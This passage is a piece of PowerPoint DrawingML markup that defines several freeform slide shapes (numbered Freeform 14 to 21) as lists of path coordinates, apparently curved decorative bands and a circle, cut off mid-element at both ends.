            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1085850" h="3133725">
                <a:moveTo>
                  <a:pt x="85725" y="3133724"/>
                </a:moveTo>
                <a:close/>
              </a:path>
              <a:path w="1085850" h="3133725">
                <a:moveTo>
                  <a:pt x="1085850" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3129904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37270" y="3132571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85725" y="3133724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134179" y="3132571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182040" y="3129146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229254" y="3123501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="275768" y="3115690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321530" y="3105763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366487" y="3093775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410587" y="3079777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453777" y="3063821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="496006" y="3045960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537220" y="3026247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="577367" y="3004733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616396" y="2981472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="654252" y="2956516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690885" y="2929916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726242" y="2901726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760270" y="2871997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="792917" y="2840783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="824131" y="2808136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="853859" y="2774107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="882048" y="2738750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908647" y="2702117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="933603" y="2664260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956864" y="2625232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="978376" y="2585085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998089" y="2543871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1015949" y="2501643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031904" y="2458453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1045902" y="2414354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1057890" y="2369398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067816" y="2323638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075627" y="2277126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081271" y="2229913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084696" y="2182054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085850" y="2133600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108585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4" name="Freeform 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553260" y="0"/>
            <a:ext cx="2360930" cy="1081405"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2360930" h="1081405">
                <a:moveTo>
                  <a:pt x="2360640" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2351430" y="74967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2343262" y="120902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2333376" y="166213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321806" y="210863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2308590" y="254818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2293762" y="298042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2277358" y="340498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2259412" y="382151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2239961" y="422966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2219041" y="462906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2196685" y="501936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2172931" y="540020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2147812" y="577123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2121366" y="613208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093626" y="648241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2064629" y="682184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034410" y="715003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2003005" y="746662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1970448" y="777125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1936776" y="806355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1902023" y="834319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1866226" y="860979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1829419" y="886301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1791639" y="910247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1752919" y="932784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1713297" y="953874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1672807" y="973482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1631485" y="991573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1589366" y="1008110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546486" y="1023058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1502880" y="1036382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1458583" y="1048045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1413632" y="1058012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1368061" y="1066246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1321905" y="1072713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1275201" y="1077377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1227984" y="1080201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1180289" y="1081151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1132593" y="1080201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085376" y="1077377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1038673" y="1072713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="992518" y="1066246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="946948" y="1058012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901997" y="1048045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="857702" y="1036382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="814097" y="1023058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="771219" y="1008110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="729101" y="991573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687781" y="973482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647293" y="953874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607673" y="932784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568956" y="910247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="531177" y="886301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494372" y="860979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="458577" y="834319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423827" y="806355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390157" y="777125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357603" y="746662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326200" y="715003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295983" y="682184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266988" y="648241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239251" y="613208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212807" y="577123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187691" y="540020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163938" y="501936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141585" y="462906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120666" y="422966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101217" y="382151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83273" y="340498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66871" y="298042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52044" y="254818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38829" y="210863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27261" y="166213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17376" y="120902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9208" y="74967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2794" y="2844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5" name="Freeform 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1962150" y="752475"/>
            <a:ext cx="400050" cy="409575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="400050" h="409575">
                <a:moveTo>
                  <a:pt x="200025" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="154155" y="5408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112050" y="20814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74911" y="44986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43937" y="76694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20327" y="114707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5281" y="157793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="204724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5281" y="251701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20327" y="294821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43937" y="332856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74911" y="364578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112050" y="388757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154155" y="404165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200025" y="409575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245894" y="404165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287999" y="388757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325138" y="364578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356112" y="332856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379722" y="294821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394768" y="251701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400050" y="204724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394768" y="157793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379722" y="114707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356112" y="76694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325138" y="44986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287999" y="20814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245894" y="5408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200025"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16" name="Freeform 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5500623"/>
            <a:ext cx="748030" cy="600710"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="748030" h="600710">
                <a:moveTo>
                  <a:pt x="747711" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="745906" y="46903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740578" y="92818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731862" y="137613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719891" y="181153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704799" y="223305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686718" y="263935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665782" y="302911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="642125" y="340099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615879" y="375365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587180" y="408577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556159" y="439600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522950" y="468301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487687" y="494548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450503" y="518207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411531" y="539143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370906" y="557225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328759" y="572318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285226" y="584289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240439" y="593005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194531" y="598333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="600138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100740" y="598333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54831" y="593005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10042" y="584289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="58152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7" name="Freeform 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2014473"/>
            <a:ext cx="748030" cy="3486150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="748030" h="3486150">
                <a:moveTo>
                  <a:pt x="0" y="18615"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10046" y="15852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54834" y="7134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100741" y="1805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194531" y="1932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240439" y="7258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285226" y="15972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328759" y="27941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370906" y="43031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411531" y="61109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450503" y="82042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487687" y="105696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522950" y="131938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556159" y="160635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587180" y="191654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615879" y="224861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="642125" y="260123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665782" y="297306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686718" y="336278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704799" y="376906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719891" y="419054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731862" y="462592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740578" y="507384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="745906" y="553299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="747711" y="600201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="747711" y="348615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8" name="Freeform 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5567426"/>
            <a:ext cx="938530" cy="790575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="938530" h="790575">
                <a:moveTo>
                  <a:pt x="938211" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="936768" y="48153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="932495" y="95543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="925474" y="142088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="915788" y="187705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903519" y="232312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888751" y="275825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871566" y="318161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852046" y="359239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="830275" y="398975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="806335" y="437286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780309" y="474091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752279" y="509306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722328" y="542848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690539" y="574635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656995" y="604584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="621778" y="632613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584971" y="658638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546656" y="682577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506917" y="704348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465835" y="723867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423495" y="741052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379977" y="755820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335366" y="768088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289744" y="777774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243193" y="784795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195796" y="789068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="790511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99476" y="789068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52079" y="784795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5528" y="777774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="776600"/>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9" name="Freeform 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1766823"/>
            <a:ext cx="938530" cy="3801110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="938530" h="3801110">
                <a:moveTo>
                  <a:pt x="0" y="13911"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5532" y="12737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52082" y="5716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99477" y="1442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195796" y="1569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243193" y="5843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289744" y="12864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335366" y="22550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379977" y="34818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423495" y="49586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465835" y="66772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506917" y="86291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546656" y="108062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584971" y="132002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="621778" y="158029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656995" y="186059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690539" y="216009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722328" y="247798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752279" y="281343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780309" y="316560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="806335" y="353367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="830275" y="391682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852046" y="431421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871566" y="472502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888751" y="514843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903519" y="558360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="915788" y="602971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="925474" y="648594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="932495" y="695145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="936768" y="742542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938211" y="790701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938211" y="380060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0" name="Freeform 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5624512"/>
            <a:ext cx="1129030" cy="981075"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1129030" h="981075">
                <a:moveTo>
                  <a:pt x="1128711" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1127580" y="47533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1124220" y="94484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118683" y="140798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1111021" y="186427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101284" y="231317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089525" y="275417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075794" y="318677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060143" y="361045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042623" y="402469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023286" y="442898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002183" y="482281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979366" y="520566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="954886" y="557701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928794" y="593636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901141" y="628319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871980" y="661699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="841361" y="693724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809336" y="724343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775956" y="753505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741273" y="781157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705338" y="807249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668202" y="831730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629917" y="854547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590535" y="875650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550106" y="894987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508682" y="912506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466314" y="928157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423054" y="941888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378953" y="953648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334063" y="963384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288435" y="971047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242120" y="976583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195170" y="979943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="981075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100102" y="979943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53152" y="976583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6837" y="971047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="96989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1" name="Freeform 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1509649"/>
            <a:ext cx="1129030" cy="4115435"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1129030" h="4115435">
                <a:moveTo>
                  <a:pt x="0" y="11177"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6837" y="10028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53152" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100102" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195170" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242120" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288435" y="10028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334063" y="17692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378953" y="27429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423054" y="39190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466314" y="52922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508682" y="68574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550106" y="86095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590535" y="105434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629917" y="126538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668202" y="149357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705338" y="173839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741273" y="199932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775956" y="227586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809336" y="256749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="841361" y="287369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871980" y="319395"/>
                </a:lnTo>
                <a:lnTo>
